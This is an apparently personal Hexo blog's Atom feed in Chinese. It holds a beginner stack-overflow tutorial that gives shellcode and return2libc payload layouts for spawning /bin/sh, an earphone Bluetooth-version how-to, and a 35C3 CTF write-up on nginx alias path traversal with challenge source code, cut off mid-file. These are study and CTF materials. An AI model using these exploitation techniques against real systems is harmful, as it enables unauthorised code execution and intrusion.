-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
462 lines (298 loc) · 205 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>从零开始的学习生涯</title>
<subtitle>FDrag0n的学习生涯</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="http://fdrag0n.github.io/"/>
<updated>2019-09-09T15:30:41.883Z</updated>
<id>http://fdrag0n.github.io/</id>
<author>
<name>FDrag0n</name>
</author>
<generator uri="http://hexo.io/">Hexo</generator>
<entry>
<title>pwn入门</title>
<link href="http://fdrag0n.github.io/2019/09/09/pwn%E5%85%A5%E9%97%A8/"/>
<id>http://fdrag0n.github.io/2019/09/09/pwn入门/</id>
<published>2019-09-09T13:44:55.000Z</published>
<updated>2019-09-09T15:30:41.883Z</updated>
<content type="html"><![CDATA[<h1 id="常见寄存器说明"><a href="#常见寄存器说明" class="headerlink" title="常见寄存器说明"></a>常见寄存器说明</h1><p>ESP:用来存储函数调用栈的栈顶地址,在压栈和退栈时发生变化。</p><p>EBP:用来存储当前函数状态的基地址,在函数运行时不变,可以用来索引确定函数参数或局部变量的位置。</p><p>EIP: 用来存储即将执行的程序指令的地址,CPU依照 EIP 的存储内容读取指令并执行,EIP随之指向相邻的下一条指令,如此反复,程序就得以连续执行指令。</p><h1 id="函数调用时栈区变化"><a href="#函数调用时栈区变化" class="headerlink" title="函数调用时栈区变化"></a>函数调用时栈区变化</h1><ol><li><p>参数<strong>逆序</strong>入栈</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225008.png" alt=""></p></li><li><p>将调用函数(caller)进行调用之后的下一条指令地址作为返回地址压入栈内。这样调用函数(caller)的 EIP(指令)信息得以保存。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225033.png" alt=""></p></li><li><p>再将当前的EBP 寄存器的值(也就是调用函数的基地址)压入栈内,并将 EBP 寄存器的值更新为当前栈顶的地址。这样调用函数(caller)的 EBP (基地址)信息得以保存。同时,EBP 被更新为被调用函数(callee)的基地址。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225054.png" alt=""></p></li><li><p>将被调用函数的局部变量压入栈内,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。在发生调用时,程序还会将被调用函数(callee)的指令地址存到 eip 寄存器内,这样程序就可以依次执行被调用函数的指令了。</p><p>看过了函数调用发生时的情况,就不难理解函数调用结束时的变化。变化的核心任务是丢弃被调用函数(callee)的状态,并将栈顶恢复为调用函数(caller)的状态。</p><p>首先被调用函数的局部变量会从栈内直接弹出,栈顶会指向被调用函数(callee)的基地址。<img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225252.png" alt=""></p></li></ol><ol><li><p>然后将基地址内存储的调用函数(caller)的基地址从栈内弹出,并存到 EBP寄存器内。这样调用函数(caller)的 EBP(基地址)信息得以恢复。此时栈顶会指向返回地址。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225649.png" alt=""></p></li><li><p>再将返回地址从栈内弹出,并存到 EIP 寄存器内。这样调用函数(caller)的 EIP(指令)信息得以恢复。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909225903.png" alt=""></p></li></ol><h1 id="栈溢出"><a href="#栈溢出" class="headerlink" title="栈溢出"></a>栈溢出</h1><p>当函数正在执行内部指令的过程中我们无法拿到程序的控制权,只有在发生函数调用或者结束函数调用时,程序的控制权会在函数状态之间发生跳转,这时才可以通过修改函数状态来实现攻击。</p><p><strong>我们的目标就是让 EIP 载入攻击指令的地址</strong></p><ol><li><p>在退栈过程中,返回地址会被传给 EIP,所以我们只需要让溢出数据用攻击指令的地址来覆盖返回地址就可以了。</p><p>我们也可以在溢出数据内包含一段攻击指令,也可以在内存其他位置寻找可用的攻击指令。</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909230218.png" alt=""></p></li></ol><ol><li>我们要做的就是将原本EIP指定的函数在调用时替换为其他函数。</li></ol><h1 id="栈溢出技术种类"><a href="#栈溢出技术种类" class="headerlink" title="栈溢出技术种类"></a>栈溢出技术种类</h1><ul><li><p>修改返回地址,让其指向溢出数据中的一段指令(<strong>shellcode</strong>)</p></li><li><p>修改返回地址,让其指向内存中已有的某个函数(<strong>return2libc</strong>)</p></li><li><p>修改返回地址,让其指向内存中已有的一段指令(<strong>ROP</strong>)</p></li><li><p>修改某个被调用函数的地址,让其指向另一个函数(<strong>hijack GOT</strong>)</p></li></ul><h2 id="shellcode"><a href="#shellcode" class="headerlink" title="shellcode"></a>shellcode</h2><p><strong>payload :</strong> padding1 + address of shellcode + padding2 + shellcode</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909230851.png" alt=""></p><p>padding1 处的数据可以随意填充(注意如果利用字符串程序输入溢出数据不要包含 “\x00” ,否则向程序传入溢出数据时会造成截断),长度应该刚好覆盖函数的基地址。address of shellcode 是后面 shellcode 起始处的地址,用来覆盖返回地址。padding2 处的数据也可以随意填充,长度可以任意。shellcode 应该为十六进制的机器码格式。</p><p>根据上面的构造,我们要解决两个问题。</p><ol><li><p>返回地址之前的填充数据(padding1)应该多长?</p><p>我们可以用调试工具(例如 gdb)查看汇编代码来确定这个距离,也可以在运行程序时用不断增加输入长度的方法来试探(如果返回地址被无效地址例如“AAAA”覆盖,程序会终止并报错)。</p></li><li><p>shellcode起始地址应该是多少?</p><p>我们可以在调试工具里查看返回地址的位置(可以查看 EBP 的内容然后再加4(32位机),参见前面关于函数状态的解释),可是在调试工具里的这个地址和正常运行时并不一致,这是运行时环境变量等因素有所不同造成的。所以这种情况下我们只能得到大致但不确切的 shellcode 起始地址,解决办法是在 padding2 里填充若干长度的 “\x90”。这个机器码对应的指令是 NOP (No Operation),也就是告诉 CPU 什么也不做,然后跳到下一条指令。有了这一段 NOP 的填充,只要返回地址能够命中这一段中的任意位置,都可以无副作用地跳转到 shellcode 的起始处,所以这种方法被称为 NOP Sled(中文含义是“滑雪橇”)。这样我们就可以通过增加 NOP 填充来配合试验 shellcode 起始地址。</p><p>操作系统可以将函数调用栈的起始地址设为随机化(这种技术被称为内存布局随机化,即Address Space Layout Randomization (ASLR) ),这样程序每次运行时函数返回地址会随机变化。反之如果操作系统关闭了上述的随机化(这是技术可以生效的前提),那么程序每次运行时函数返回地址会是相同的,这样我们可以通过输入无效的溢出数据来生成core文件,再通过调试工具在core文件中找到返回地址的位置,从而确定 shellcode 的起始地址。</p><p>解决完上述问题,我们就可以拼接出最终的溢出数据,输入至程序来执行 shellcode 了。</p></li></ol><p><img src="C:\Users\Admin\AppData\Roaming\Typora\typora-user-images\1568042353901.png" alt="1568042353901"></p><p>这种方法生效的一个前提是在函数调用栈上的数据(shellcode)要有可执行的权限(另一个前提是上面提到的关闭内存布局随机化)。很多时候操作系统会关闭函数调用栈的可执行权限,这样 shellcode 的方法就失效了,不过我们还可以尝试使用内存里已有的指令或函数,毕竟这些部分本来就是可执行的,所以不会受上述执行权限的限制。这就包括 return2libc 和 ROP 两种方法。</p><h2 id="Return2libc"><a href="#Return2libc" class="headerlink" title="Return2libc"></a>Return2libc</h2><p>在内存中确定某个函数的地址,并用其覆盖掉返回地址。由于 libc 动态链接库中的函数被广泛使用,所以有很大概率可以在内存中找到该动态库。同时由于该库包含了一些系统级的函数(例如 system() 等),所以通常使用这些系统级函数来获得当前进程的控制权。鉴于要执行的函数可能需要参数,比如调用 system() 函数打开 shell 的完整形式为 system(“/bin/sh”) ,所以溢出数据也要包括必要的参数。下面就以执行 system(“/bin/sh”) 为例,先写出溢出数据的组成,再确定对应的各部分填充进去。</p><p><strong>payload:</strong> padding1 + address of system() + padding2 + address of “/bin/sh”</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190909232547.png" alt=""></p><p>padding1 处的数据可以随意填充(注意不要包含 “\x00” ,否则向程序传入溢出数据时会造成截断),长度应该刚好覆盖函数的基地址。address of system() 是 system() 在内存中的地址,用来覆盖返回地址。padding2 处的数据长度为4(32位机),对应调用 system() 时的返回地址。因为我们在这里只需要打开 shell 就可以,并不关心从 shell 退出之后的行为,所以 padding2 的内容可以随意填充。address of “/bin/sh” 是字符串 “/bin/sh” 在内存中的地址,作为传给 system() 的参数。</p><p>根据上面的构造,我们要解决个问题。</p><ol><li><p>返回地址之前的填充数据(padding1)应该多长?</p><p>解决方法和 shellcode 中提到的答案一样。</p></li><li><p>system() 函数地址应该是多少?</p><p>要回答这个问题,就要看看程序是如何调用动态链接库中的函数的。当函数被动态链接至程序中,程序在运行时首先确定动态链接库在内存的起始地址,再加上函数在动态库中的相对偏移量,最终得到函数在内存的绝对地址。说到确定动态库的内存地址,就要回顾一下 shellcode 中提到的内存布局随机化(ASLR),这项技术也会将动态库加载的起始地址做随机化处理。所以,如果操作系统打开了 ASLR,程序每次运行时动态库的起始地址都会变化,也就无从确定库内函数的绝对地址。在 ASLR 被关闭的前提下,我们可以通过调试工具在运行程序过程中直接查看 system() 的地址,也可以查看动态库在内存的起始地址,再在动态库内查看函数的相对偏移位置,通过计算得到函数的绝对地址。</p></li></ol><p>最后,“/bin/sh” 的地址在哪里?</p><p>可以在动态库里搜索这个字符串,如果存在,就可以按照动态库起始地址+相对偏移来确定其绝对地址。如果在动态库里找不到,可以将这个字符串加到环境变量里,再通过 getenv() 等函数来确定地址。</p><p>解决完上述问题,我们就可以拼接出溢出数据,输入至程序来通过 system() 打开 shell 了。</p><h2 id="以上两种方案都需要操作系统关闭布局随机化(ASLR)"><a href="#以上两种方案都需要操作系统关闭布局随机化(ASLR)" class="headerlink" title="以上两种方案都需要操作系统关闭布局随机化(ASLR)"></a>以上两种方案都需要操作系统关闭布局随机化(ASLR)</h2><p>两种方法都是通过覆盖返回地址来执行输入的指令片段(shellcode)或者动态库中的函数(return2libc)。需要指出的是,这两种方法都需要操作系统关闭内存布局随机化(ASLR),而且 shellcode 还需要程序调用栈有可执行权限。</p><p>下面的另外两种执行方法,其中有可以绕过内存布局随机化(ASLR)的方法,敬请关注。</p>]]></content>
<summary type="html">
<h1 id="常见寄存器说明"><a href="#常见寄存器说明" class="headerlink" title="常见寄存器说明"></a>常见寄存器说明</h1><p>ESP:用来存储函数调用栈的栈顶地址,在压栈和退栈时发生变化。</p>
<p>EBP:用来存储当前函
</summary>
<category term="pwn" scheme="http://fdrag0n.github.io/tags/pwn/"/>
</entry>
<entry>
<title>获取你耳机的蓝牙版本</title>
<link href="http://fdrag0n.github.io/2019/08/27/%E8%8E%B7%E5%8F%96%E4%BD%A0%E8%80%B3%E6%9C%BA%E7%9A%84%E8%93%9D%E7%89%99%E7%89%88%E6%9C%AC/"/>
<id>http://fdrag0n.github.io/2019/08/27/获取你耳机的蓝牙版本/</id>
<published>2019-08-27T07:34:55.000Z</published>
<updated>2019-08-27T07:56:54.374Z</updated>
<content type="html"><![CDATA[<h1 id="蓝牙耳机"><a href="#蓝牙耳机" class="headerlink" title="蓝牙耳机"></a>蓝牙耳机</h1><p>在各大手机厂干掉了耳机口之后,他们就可以更好地卖蓝牙耳机了。</p><p>各大,卖点也出来了,什么TWS,蓝牙5.0,aptx,aac,ldac等等</p><p>TWS:为True Wireless Stereo的缩写,是<strong>真正无线立体声</strong></p><p>蓝牙5.0:于美国时间2016年6月16日在伦敦正式发布,为现阶段最高级的蓝牙协议标准。</p><p>但是怎么知道一款耳机到底是不是蓝牙5.0呢?而它具体的芯片是哪一款呢?这些很多厂家都不会告诉你。</p><h1 id="获取你耳机的蓝牙版本"><a href="#获取你耳机的蓝牙版本" class="headerlink" title="获取你耳机的蓝牙版本"></a>获取你耳机的蓝牙版本</h1><ol><li><p>以小米手机为例,开启开发者模式的蓝牙抓包日志</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190827154743.jpg" alt=""><br>如图上白点处,各手机操作差不多</p></li><li><p>将系统存储目录下的./MUIU/debug_log/common/btsnoop_hci.log(不同的手机这个文件的位置不同,可以自行搜索确认。还有的手机可能需要root权限,在/data/misc/bluetooth/logs下面)文件发送至电脑</p></li><li><p>使用wireshark打开日志文件,搜索Read Remote Version Information Complete</p><p><img src="https://raw.githubusercontent.com/FDrag0n/image/master/img/20190827155432.png" alt=""></p><p>在红线的位置即可查看目标设备的蓝牙版本号和芯片厂家</p></li></ol><p>协议的文档读的头疼,剩下的可能懒得看了0.0</p>]]></content>
<summary type="html">
<h1 id="蓝牙耳机"><a href="#蓝牙耳机" class="headerlink" title="蓝牙耳机"></a>蓝牙耳机</h1><p>在各大手机厂干掉了耳机口之后,他们就可以更好地卖蓝牙耳机了。</p>
<p>各大,卖点也出来了,什么TWS,蓝牙5.0,ap
</summary>
</entry>
<entry>
<title>35C3-POST</title>
<link href="http://fdrag0n.github.io/2019/04/19/2019-4-19-35C3-POST/"/>
<id>http://fdrag0n.github.io/2019/04/19/2019-4-19-35C3-POST/</id>
<published>2019-04-19T02:47:49.000Z</published>
<updated>2019-12-05T13:20:02.462Z</updated>
<content type="html"><![CDATA[<h1 id="35C3-POST"><a href="#35C3-POST" class="headerlink" title="35C3-POST"></a>35C3-POST</h1><p>扫描目录得到uploads目录,测试目录穿越成功,得到nginx备份文件和源码</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">server {</span><br><span class="line">listen 80;</span><br><span class="line"> access_log /var/log/nginx/example.log;</span><br><span class="line"></span><br><span class="line"> server_name localhost;</span><br><span class="line"></span><br><span class="line"> root /var/www/html;</span><br><span class="line"></span><br><span class="line"> location /uploads {</span><br><span class="line"> autoindex on;</span><br><span class="line"> alias /var/www/uploads/;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location / {</span><br><span class="line"> alias /var/www/html/;</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ {</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> location /inc/ {</span><br><span class="line"> deny all;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">server {</span><br><span class="line"> listen 127.0.0.1:8080;</span><br><span class="line"> access_log /var/log/nginx/proxy.log;</span><br><span class="line"></span><br><span class="line"> if ( $request_method !~ ^(GET)$ ) {</span><br><span class="line"> return 405;</span><br><span class="line"> }</span><br><span class="line"> root /var/www/miniProxy;</span><br><span class="line"> location / {</span><br><span class="line"> index index.php;</span><br><span class="line"></span><br><span class="line"> location ~ \.php$ {</span><br><span class="line"> include snippets/fastcgi-php.conf;</span><br><span class="line"> fastcgi_pass unix:/run/php/php7.2-fpm.sock;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line">}</span><br></pre></td></tr></table></figure><a id="more"></a><p>由于 url 没加后缀 /,而 alias 设置了有后缀 / 配置,导致可以利用 ../ 绕过限制访问目录。</p><p>db.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DB</span> </span>{</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> $con;</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> $init = <span class="keyword">false</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">initialize</span><span class="params">()</span> </span>{</span><br><span class="line"> DB::$con = sqlsrv_connect(<span class="string">"db"</span>, <span class="keyword">array</span>(<span class="string">"pwd"</span>=> <span class="string">"Foobar1!"</span>, <span class="string">"uid"</span>=><span class="string">"challenger"</span>, <span class="string">"Database"</span>=><span class="string">"challenge"</span>));</span><br><span class="line"> <span class="keyword">if</span> (!DB::$con) DB::error();</span><br><span class="line"> DB::$init = <span class="keyword">true</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">error</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"db error"</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">prepare_params</span><span class="params">($params)</span> </span>{</span><br><span class="line"> <span class="keyword">return</span> array_map(<span class="function"><span class="keyword">function</span><span class="params">($x)</span></span>{</span><br><span class="line"> <span class="keyword">if</span> (is_object($x) <span class="keyword">or</span> is_array($x)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'$serializedobject$'</span> . serialize($x);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (preg_match(<span class="string">'/^\$serializedobject\$/i'</span>, $x)) {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"invalid data"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="string">""</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $x;</span><br><span class="line"> }, $params);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">private</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">retrieve_values</span><span class="params">($res)</span> </span>{</span><br><span class="line"> $result = <span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">while</span> ($row = sqlsrv_fetch_array($res)) {</span><br><span class="line"> $result[] = array_map(<span class="function"><span class="keyword">function</span><span class="params">($x)</span></span>{</span><br><span class="line"> <span class="keyword">return</span> preg_match(<span class="string">'/^\$serializedobject\$/i'</span>, $x) ?</span><br><span class="line"> unserialize(substr($x, <span class="number">18</span>)) : $x;</span><br><span class="line"> }, $row);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> $result;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">query</span><span class="params">($sql, $values=array<span class="params">()</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (!is_array($values)) $values = <span class="keyword">array</span>($values);</span><br><span class="line"> <span class="keyword">if</span> (!DB::$init) DB::initialize();</span><br><span class="line"> $res = sqlsrv_query(DB::$con, $sql, $values);</span><br><span class="line"> <span class="keyword">if</span> ($res === <span class="keyword">false</span>) DB::error();</span><br><span class="line"> <span class="keyword">return</span> DB::retrieve_values($res);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">insert</span><span class="params">($sql, $values=array<span class="params">()</span>)</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (!is_array($values)) $values = <span class="keyword">array</span>($values);</span><br><span class="line"> <span class="keyword">if</span> (!DB::$init) DB::initialize();</span><br><span class="line"> $values = DB::prepare_params($values);</span><br><span class="line"> $x = sqlsrv_query(DB::$con, $sql, $values);</span><br><span class="line"> <span class="keyword">if</span> (!$x) <span class="keyword">throw</span> <span class="keyword">new</span> <span class="keyword">Exception</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>default.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span> </span><br><span class="line"><span class="keyword">include</span> <span class="string">'inc/post.php'</span>;</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">"title"</span>])) {</span><br><span class="line"> $attachments = <span class="keyword">array</span>();</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_FILES[<span class="string">"attach"</span>]) && is_array($_FILES[<span class="string">"attach"</span>])) {</span><br><span class="line"> $folder = sha1(random_bytes(<span class="number">10</span>));</span><br><span class="line"> mkdir(<span class="string">"../uploads/$folder"</span>);</span><br><span class="line"> <span class="keyword">for</span> ($i = <span class="number">0</span>; $i < count($_FILES[<span class="string">"attach"</span>][<span class="string">"tmp_name"</span>]); $i++) {</span><br><span class="line"> <span class="keyword">if</span> ($_FILES[<span class="string">"attach"</span>][<span class="string">"error"</span>][$i] !== <span class="number">0</span>) <span class="keyword">continue</span>;</span><br><span class="line"> $name = basename($_FILES[<span class="string">"attach"</span>][<span class="string">"name"</span>][$i]);</span><br><span class="line"> move_uploaded_file($_FILES[<span class="string">"attach"</span>][<span class="string">"tmp_name"</span>][$i], <span class="string">"../uploads/$folder/$name"</span>);</span><br><span class="line"> $attachments[] = <span class="keyword">new</span> Attachment(<span class="string">"/uploads/$folder/$name"</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $post = <span class="keyword">new</span> Post($_POST[<span class="string">"title"</span>], $_POST[<span class="string">"content"</span>], $attachments);</span><br><span class="line"> $post->save();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">"action"</span>])) {</span><br><span class="line"> <span class="keyword">if</span> ($_GET[<span class="string">"action"</span>] == <span class="string">"restart"</span>) {</span><br><span class="line"> Post::truncate();</span><br><span class="line"> header(<span class="string">"Location: /"</span>);</span><br><span class="line"> <span class="keyword">die</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"><span class="meta">?></span></span><br><span class="line"><h2>Create <span class="keyword">new</span> post</h2></span><br><span class="line"><form method=<span class="string">"POST"</span> enctype=<span class="string">"multipart/form-data"</span>></span><br><span class="line"><table></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span class="string">"title"</span>>Title</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"title"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span class="string">"content"</span>>Content</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"content"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"><label <span class="keyword">for</span>=<span class="string">"attach"</span>>Attachments</label></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr></span><br><span class="line"><td></span><br><span class="line"></td> <td></span><br><span class="line"><input name=<span class="string">"attach[]"</span> type=<span class="string">"file"</span>></span><br><span class="line"></td></span><br><span class="line"></tr></span><br><span class="line"><tr><td></td><td></span><br><span class="line"><input type=<span class="string">"submit"</span>></span><br><span class="line"></td></tr></span><br><span class="line"></table></span><br><span class="line"></form></span><br><span class="line"><span class="meta"><?php</span> </span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> $posts = Post::loadall();</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">empty</span>($posts)) {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<b>You do not have any posts. Create <a href=\"/?action=create\">some</a>!</b>"</span>;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<b>You have "</span> . count($posts) .<span class="string">" posts. Create <a href=\"/?action=create\">some</a> more if you want! Or <a href=\"/?action=restart\">restart your blog</a>.</b>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">foreach</span>($posts <span class="keyword">as</span> $p) {</span><br><span class="line"> <span class="keyword">echo</span> $p;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<br><br>"</span>;</span><br><span class="line"> }</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>post.php</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span 